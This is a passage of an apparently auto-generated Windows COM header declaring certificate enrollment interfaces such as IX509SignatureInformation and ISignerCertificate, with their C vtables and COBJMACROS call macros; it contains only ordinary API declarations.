            /* [in] */ __RPC__in BSTR strId,
            /* [in] */ __RPC__in BSTR strEnrollmentServerUrl);
        
        HRESULT ( STDMETHODCALLTYPE *GetPolicyServerUrl )( 
            __RPC__in ICertPropertyEnrollmentPolicyServer * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *GetPolicyServerId )( 
            __RPC__in ICertPropertyEnrollmentPolicyServer * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *GetEnrollmentServerUrl )( 
            __RPC__in ICertPropertyEnrollmentPolicyServer * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *GetRequestIdString )( 
            __RPC__in ICertPropertyEnrollmentPolicyServer * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *GetPropertyFlags )( 
            __RPC__in ICertPropertyEnrollmentPolicyServer * This,
            /* [retval][out] */ __RPC__out EnrollmentPolicyServerPropertyFlags *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *GetUrlFlags )( 
            __RPC__in ICertPropertyEnrollmentPolicyServer * This,
            /* [retval][out] */ __RPC__out PolicyServerUrlFlags *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *GetAuthentication )( 
            __RPC__in ICertPropertyEnrollmentPolicyServer * This,
            /* [retval][out] */ __RPC__out X509EnrollmentAuthFlags *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *GetEnrollmentServerAuthentication )( 
            __RPC__in ICertPropertyEnrollmentPolicyServer * This,
            /* [retval][out] */ __RPC__out X509EnrollmentAuthFlags *pValue);
        
        END_INTERFACE
    } ICertPropertyEnrollmentPolicyServerVtbl;

    interface ICertPropertyEnrollmentPolicyServer
    {
        CONST_VTBL struct ICertPropertyEnrollmentPolicyServerVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define ICertPropertyEnrollmentPolicyServer_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define ICertPropertyEnrollmentPolicyServer_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define ICertPropertyEnrollmentPolicyServer_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define ICertPropertyEnrollmentPolicyServer_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define ICertPropertyEnrollmentPolicyServer_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define ICertPropertyEnrollmentPolicyServer_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define ICertPropertyEnrollmentPolicyServer_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define ICertPropertyEnrollmentPolicyServer_InitializeFromCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> InitializeFromCertificate(This,MachineContext,Encoding,strCertificate) ) 

#define ICertPropertyEnrollmentPolicyServer_InitializeDecode(This,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> InitializeDecode(This,Encoding,strEncodedData) ) 

#define ICertPropertyEnrollmentPolicyServer_get_PropertyId(This,pValue)	\
    ( (This)->lpVtbl -> get_PropertyId(This,pValue) ) 

#define ICertPropertyEnrollmentPolicyServer_put_PropertyId(This,Value)	\
    ( (This)->lpVtbl -> put_PropertyId(This,Value) ) 

#define ICertPropertyEnrollmentPolicyServer_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 

#define ICertPropertyEnrollmentPolicyServer_RemoveFromCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> RemoveFromCertificate(This,MachineContext,Encoding,strCertificate) ) 

#define ICertPropertyEnrollmentPolicyServer_SetValueOnCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> SetValueOnCertificate(This,MachineContext,Encoding,strCertificate) ) 


#define ICertPropertyEnrollmentPolicyServer_Initialize(This,PropertyFlags,AuthFlags,EnrollmentServerAuthFlags,UrlFlags,strRequestId,strUrl,strId,strEnrollmentServerUrl)	\
    ( (This)->lpVtbl -> Initialize(This,PropertyFlags,AuthFlags,EnrollmentServerAuthFlags,UrlFlags,strRequestId,strUrl,strId,strEnrollmentServerUrl) ) 

#define ICertPropertyEnrollmentPolicyServer_GetPolicyServerUrl(This,pValue)	\
    ( (This)->lpVtbl -> GetPolicyServerUrl(This,pValue) ) 

#define ICertPropertyEnrollmentPolicyServer_GetPolicyServerId(This,pValue)	\
    ( (This)->lpVtbl -> GetPolicyServerId(This,pValue) ) 

#define ICertPropertyEnrollmentPolicyServer_GetEnrollmentServerUrl(This,pValue)	\
    ( (This)->lpVtbl -> GetEnrollmentServerUrl(This,pValue) ) 

#define ICertPropertyEnrollmentPolicyServer_GetRequestIdString(This,pValue)	\
    ( (This)->lpVtbl -> GetRequestIdString(This,pValue) ) 

#define ICertPropertyEnrollmentPolicyServer_GetPropertyFlags(This,pValue)	\
    ( (This)->lpVtbl -> GetPropertyFlags(This,pValue) ) 

#define ICertPropertyEnrollmentPolicyServer_GetUrlFlags(This,pValue)	\
    ( (This)->lpVtbl -> GetUrlFlags(This,pValue) ) 

#define ICertPropertyEnrollmentPolicyServer_GetAuthentication(This,pValue)	\
    ( (This)->lpVtbl -> GetAuthentication(This,pValue) ) 

#define ICertPropertyEnrollmentPolicyServer_GetEnrollmentServerAuthentication(This,pValue)	\
    ( (This)->lpVtbl -> GetEnrollmentServerAuthentication(This,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __ICertPropertyEnrollmentPolicyServer_INTERFACE_DEFINED__ */


#ifndef __IX509SignatureInformation_INTERFACE_DEFINED__
#define __IX509SignatureInformation_INTERFACE_DEFINED__

/* interface IX509SignatureInformation */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509SignatureInformation;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab33c-217d-11da-b2a4-000e7bbb2b09")
    IX509SignatureInformation : public IDispatch
    {
    public:
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_HashAlgorithm( 
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_HashAlgorithm( 
            /* [in] */ __RPC__in_opt IObjectId *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_PublicKeyAlgorithm( 
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_PublicKeyAlgorithm( 
            /* [in] */ __RPC__in_opt IObjectId *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Parameters( 
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_Parameters( 
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_AlternateSignatureAlgorithm( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_AlternateSignatureAlgorithm( 
            /* [in] */ VARIANT_BOOL Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_AlternateSignatureAlgorithmSet( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_NullSigned( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_NullSigned( 
            /* [in] */ VARIANT_BOOL Value) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetSignatureAlgorithm( 
            /* [in] */ VARIANT_BOOL Pkcs7Signature,
            /* [in] */ VARIANT_BOOL SignatureKey,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE SetDefaultValues( void) = 0;
        
    };
    
#else 	/* C style interface */

    typedef struct IX509SignatureInformationVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509SignatureInformation * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            __RPC__deref_out  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509SignatureInformation * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509SignatureInformation * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509SignatureInformation * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509SignatureInformation * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509SignatureInformation * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509SignatureInformation * This,
            /* [in] */ DISPID dispIdMember,
            /* [in] */ REFIID riid,
            /* [in] */ LCID lcid,
            /* [in] */ WORD wFlags,
            /* [out][in] */ DISPPARAMS *pDispParams,
            /* [out] */ VARIANT *pVarResult,
            /* [out] */ EXCEPINFO *pExcepInfo,
            /* [out] */ UINT *puArgErr);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_HashAlgorithm )( 
            __RPC__in IX509SignatureInformation * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_HashAlgorithm )( 
            __RPC__in IX509SignatureInformation * This,
            /* [in] */ __RPC__in_opt IObjectId *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_PublicKeyAlgorithm )( 
            __RPC__in IX509SignatureInformation * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_PublicKeyAlgorithm )( 
            __RPC__in IX509SignatureInformation * This,
            /* [in] */ __RPC__in_opt IObjectId *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Parameters )( 
            __RPC__in IX509SignatureInformation * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_Parameters )( 
            __RPC__in IX509SignatureInformation * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_AlternateSignatureAlgorithm )( 
            __RPC__in IX509SignatureInformation * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_AlternateSignatureAlgorithm )( 
            __RPC__in IX509SignatureInformation * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_AlternateSignatureAlgorithmSet )( 
            __RPC__in IX509SignatureInformation * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_NullSigned )( 
            __RPC__in IX509SignatureInformation * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_NullSigned )( 
            __RPC__in IX509SignatureInformation * This,
            /* [in] */ VARIANT_BOOL Value);
        
        HRESULT ( STDMETHODCALLTYPE *GetSignatureAlgorithm )( 
            __RPC__in IX509SignatureInformation * This,
            /* [in] */ VARIANT_BOOL Pkcs7Signature,
            /* [in] */ VARIANT_BOOL SignatureKey,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        HRESULT ( STDMETHODCALLTYPE *SetDefaultValues )( 
            __RPC__in IX509SignatureInformation * This);
        
        END_INTERFACE
    } IX509SignatureInformationVtbl;

    interface IX509SignatureInformation
    {
        CONST_VTBL struct IX509SignatureInformationVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509SignatureInformation_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509SignatureInformation_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509SignatureInformation_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509SignatureInformation_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509SignatureInformation_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509SignatureInformation_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509SignatureInformation_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509SignatureInformation_get_HashAlgorithm(This,ppValue)	\
    ( (This)->lpVtbl -> get_HashAlgorithm(This,ppValue) ) 

#define IX509SignatureInformation_put_HashAlgorithm(This,pValue)	\
    ( (This)->lpVtbl -> put_HashAlgorithm(This,pValue) ) 

#define IX509SignatureInformation_get_PublicKeyAlgorithm(This,ppValue)	\
    ( (This)->lpVtbl -> get_PublicKeyAlgorithm(This,ppValue) ) 

#define IX509SignatureInformation_put_PublicKeyAlgorithm(This,pValue)	\
    ( (This)->lpVtbl -> put_PublicKeyAlgorithm(This,pValue) ) 

#define IX509SignatureInformation_get_Parameters(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_Parameters(This,Encoding,pValue) ) 

#define IX509SignatureInformation_put_Parameters(This,Encoding,Value)	\
    ( (This)->lpVtbl -> put_Parameters(This,Encoding,Value) ) 

#define IX509SignatureInformation_get_AlternateSignatureAlgorithm(This,pValue)	\
    ( (This)->lpVtbl -> get_AlternateSignatureAlgorithm(This,pValue) ) 

#define IX509SignatureInformation_put_AlternateSignatureAlgorithm(This,Value)	\
    ( (This)->lpVtbl -> put_AlternateSignatureAlgorithm(This,Value) ) 

#define IX509SignatureInformation_get_AlternateSignatureAlgorithmSet(This,pValue)	\
    ( (This)->lpVtbl -> get_AlternateSignatureAlgorithmSet(This,pValue) ) 

#define IX509SignatureInformation_get_NullSigned(This,pValue)	\
    ( (This)->lpVtbl -> get_NullSigned(This,pValue) ) 

#define IX509SignatureInformation_put_NullSigned(This,Value)	\
    ( (This)->lpVtbl -> put_NullSigned(This,Value) ) 

#define IX509SignatureInformation_GetSignatureAlgorithm(This,Pkcs7Signature,SignatureKey,ppValue)	\
    ( (This)->lpVtbl -> GetSignatureAlgorithm(This,Pkcs7Signature,SignatureKey,ppValue) ) 

#define IX509SignatureInformation_SetDefaultValues(This)	\
    ( (This)->lpVtbl -> SetDefaultValues(This) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509SignatureInformation_INTERFACE_DEFINED__ */


#ifndef __ISignerCertificate_INTERFACE_DEFINED__
#define __ISignerCertificate_INTERFACE_DEFINED__

/* interface ISignerCertificate */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_ISignerCertificate;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab33d-217d-11da-b2a4-000e7bbb2b09")
    ISignerCertificate : public IDispatch
    {
    public:
        virtual /* [custom] */ HRESULT STDMETHODCALLTYPE Initialize( 
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ X509PrivateKeyVerify VerifyType,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertifcate) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Certificate( 
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_PrivateKey( 
            /* [retval][out] */ __RPC__deref_out_opt IX509PrivateKey **ppValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Silent( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_Silent( 
            /* [in] */ VARIANT_BOOL Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_ParentWindow( 
            /* [retval][out] */ __RPC__out LONG *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_ParentWindow( 
            /* [in] */ LONG Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_UIContextMessage( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_UIContextMessage( 
            /* [in] */ __RPC__in BSTR Value) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_Pin( 
            /* [in] */ __RPC__in BSTR Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_SignatureInformation( 
            /* [retval][out] */ __RPC__deref_out_opt IX509SignatureInformation **ppValue) = 0;
        
    };
    
#else 	/* C style interface */

    typedef struct ISignerCertificateVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in ISignerCertificate * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            __RPC__deref_out  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in ISignerCertificate * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in ISignerCertificate * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in ISignerCertificate * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in ISignerCertificate * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in ISignerCertificate * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            ISignerCertificate * This,
            /* [in] */ DISPID dispIdMember,
            /* [in] */ REFIID riid,
            /* [in] */ LCID lcid,
            /* [in] */ WORD wFlags,
            /* [out][in] */ DISPPARAMS *pDispParams,
            /* [out] */ VARIANT *pVarResult,
            /* [out] */ EXCEPINFO *pExcepInfo,
            /* [out] */ UINT *puArgErr);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in ISignerCertificate * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ X509PrivateKeyVerify VerifyType,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertifcate);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Certificate )( 
            __RPC__in ISignerCertificate * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_PrivateKey )( 
            __RPC__in ISignerCertificate * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509PrivateKey **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Silent )( 
            __RPC__in ISignerCertificate * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_Silent )( 
            __RPC__in ISignerCertificate * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ParentWindow )( 
            __RPC__in ISignerCertificate * This,
            /* [retval][out] */ __RPC__out LONG *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_ParentWindow )( 
            __RPC__in ISignerCertificate * This,
            /* [in] */ LONG Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_UIContextMessage )( 
            __RPC__in ISignerCertificate * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_UIContextMessage )( 
            __RPC__in ISignerCertificate * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_Pin )( 
            __RPC__in ISignerCertificate * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SignatureInformation )( 
            __RPC__in ISignerCertificate * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509SignatureInformation **ppValue);
        
        END_INTERFACE
    } ISignerCertificateVtbl;

    interface ISignerCertificate
    {
        CONST_VTBL struct ISignerCertificateVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define ISignerCertificate_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define ISignerCertificate_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define ISignerCertificate_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define ISignerCertificate_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define ISignerCertificate_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define ISignerCertificate_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define ISignerCertificate_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define ISignerCertificate_Initialize(This,MachineContext,VerifyType,Encoding,strCertifcate)	\
    ( (This)->lpVtbl -> Initialize(This,MachineContext,VerifyType,Encoding,strCertifcate) ) 

#define ISignerCertificate_get_Certificate(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_Certificate(This,Encoding,pValue) ) 

#define ISignerCertificate_get_PrivateKey(This,ppValue)	\
    ( (This)->lpVtbl -> get_PrivateKey(This,ppValue) ) 

#define ISignerCertificate_get_Silent(This,pValue)	\
    ( (This)->lpVtbl -> get_Silent(This,pValue) ) 

#define ISignerCertificate_put_Silent(This,Value)	\
    ( (This)->lpVtbl -> put_Silent(This,Value) ) 

#define ISignerCertificate_get_ParentWindow(This,pValue)	\
    ( (This)->lpVtbl -> get_ParentWindow(This,pValue) ) 

#define ISignerCertificate_put_ParentWindow(This,Value)	\
    ( (This)->lpVtbl -> put_ParentWindow(This,Value) ) 

#define ISignerCertificate_get_UIContextMessage(This,pValue)	\
    ( (This)->lpVtbl -> get_UIContextMessage(This,pValue) ) 

#define ISignerCertificate_put_UIContextMessage(This,Value)	\
    ( (This)->lpVtbl -> put_UIContextMessage(This,Value) ) 

#define ISignerCertificate_put_Pin(This,Value)	\
    ( (This)->lpVtbl -> put_Pin(This,Value) ) 

#define ISignerCertificate_get_SignatureInformation(This,ppValue)	\
    ( (This)->lpVtbl -> get_SignatureInformation(This,ppValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __ISignerCertificate_INTERFACE_DEFINED__ */


#ifndef __ISignerCertificates_INTERFACE_DEFINED__
#define __ISignerCertificates_INTERFACE_DEFINED__

/* interface ISignerCertificates */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_ISignerCertificates;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab33e-217d-11da-b2a4-000e7bbb2b09")
    ISignerCertificates : public IDispatch
    {
    public:
        virtual /* [helpstring][id][propget][custom] */ HRESULT STDMETHODCALLTYPE get_ItemByIndex( 
            /* [in] */ LONG Index,
            /* [retval][out] */ __RPC__deref_out_opt ISignerCertificate **pVal) = 0;
        
        virtual /* [helpstring][id][propget][custom] */ HRESULT STDMETHODCALLTYPE get_Count( 
            /* [retval][out] */ __RPC__out long *pVal) = 0;
        
        virtual /* [restricted][helpstring][id][propget] */ HRESULT STDMETHODCALLTYPE get__NewEnum( 
            /* [retval][out] */ __RPC__deref_out_opt LPUNKNOWN *pVal) = 0;
        
        virtual /* [helpstring][id][custom] */ HRESULT STDMETHODCALLTYPE Add( 
            /* [in] */ __RPC__in_opt ISignerCertificate *pVal) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Remove( 
            /* [in] */ LONG Index) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Clear( void) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE Find( 
            /* [in] */ __RPC__in_opt ISignerCertificate *pSignerCert,
            /* [retval][out] */ __RPC__out LONG *piSignerCert) = 0;
        
    };
    
#else 	/* C style interface */

    typedef struct ISignerCertificatesVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in ISignerCertificates * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            __RPC__deref_out  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in ISignerCertificates * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in ISignerCertificates * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in ISignerCertificates * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in ISignerCertificates * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in ISignerCertificates * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            ISignerCertificates * This,
            /* [in] */ DISPID dispIdMember,
            /* [in] */ REFIID riid,
            /* [in] */ LCID lcid,
            /* [in] */ WORD wFlags,
            /* [out][in] */ DISPPARAMS *pDispParams,
            /* [out] */ VARIANT *pVarResult,
            /* [out] */ EXCEPINFO *pExcepInfo,
            /* [out] */ UINT *puArgErr);
        
        /* [helpstring][id][propget][custom] */ HRESULT ( STDMETHODCALLTYPE *get_ItemByIndex )( 
            __RPC__in ISignerCertificates * This,
            /* [in] */ LONG Index,
            /* [retval][out] */ __RPC__deref_out_opt ISignerCertificate **pVal);
        
        /* [helpstring][id][propget][custom] */ HRESULT ( STDMETHODCALLTYPE *get_Count )( 
            __RPC__in ISignerCertificates * This,
            /* [retval][out] */ __RPC__out long *pVal);
        
        /* [restricted][helpstring][id][propget] */ HRESULT ( STDMETHODCALLTYPE *get__NewEnum )( 
            __RPC__in ISignerCertificates * This,
            /* [retval][out] */ __RPC__deref_out_opt LPUNKNOWN *pVal);
        
        /* [helpstring][id][custom] */ HRESULT ( STDMETHODCALLTYPE *Add )( 
            __RPC__in ISignerCertificates * This,
